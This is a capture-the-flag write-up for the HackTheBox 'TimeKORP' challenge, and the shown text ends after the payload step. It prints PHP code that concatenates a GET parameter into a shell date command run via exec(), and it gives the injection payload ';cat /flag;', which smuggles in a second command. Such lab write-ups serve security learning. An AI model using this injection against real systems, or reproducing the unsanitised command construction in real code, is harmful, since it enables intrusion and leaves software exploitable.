TimeKORP — HackTheBox

Description

"Are you ready to unravel the mysteries and expose the truth hidden within KROP's digital domain? Join the challenge and prove your prowess in the world of cybersecurity. Remember, time is money, but in this case, the rewards may be far greater than you imagine."

Target: http://154.57.164.74:30639

Analysis

1. Reconnaissance — Source Code

Downloaded and extracted the archive with the task source code. Structure — PHP MVC application:

File	Purpose
TimeModel.php	Model — builds and executes shell command date
TimeController.php	Controller — accepts GET parameter format
index.php	Entry point
Router.php	Routing
Dockerfile	Shows flag location: /flag

2. Vulnerable Code

challenge/models/TimeModel.php — command is built via concatenation:

<?php
class TimeModel
{
    public function __construct($format)
    {
        $this->command = "date '+" . $format . "' 2>&1";
    }

    public function getTime()
    {
        $time = exec($this->command);
        $res  = isset($time) ? $time : '?';
        return $res;
    }
}

challenge/controllers/TimeController.php — user input is passed without filtering:

<?php
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}

3. Vulnerability Chain

GET /?format=PAYLOAD
    → TimeController: $format = $_GET['format']  (no sanitization)
    → TimeModel: "date '+" . $format . "' 2>&1"  (concatenation into shell command)
    → exec($this->command)                        (execution via shell)

Problem: GET parameter format is directly concatenated into the shell command string passed to exec(). Although user input is placed inside single quotes ('), this is not a protection — it's enough to close the quote and insert an arbitrary command.

Solution

Step 1: Building the Payload

Command template:

date '+FORMAT' 2>&1

Payload: ';cat /flag;'

...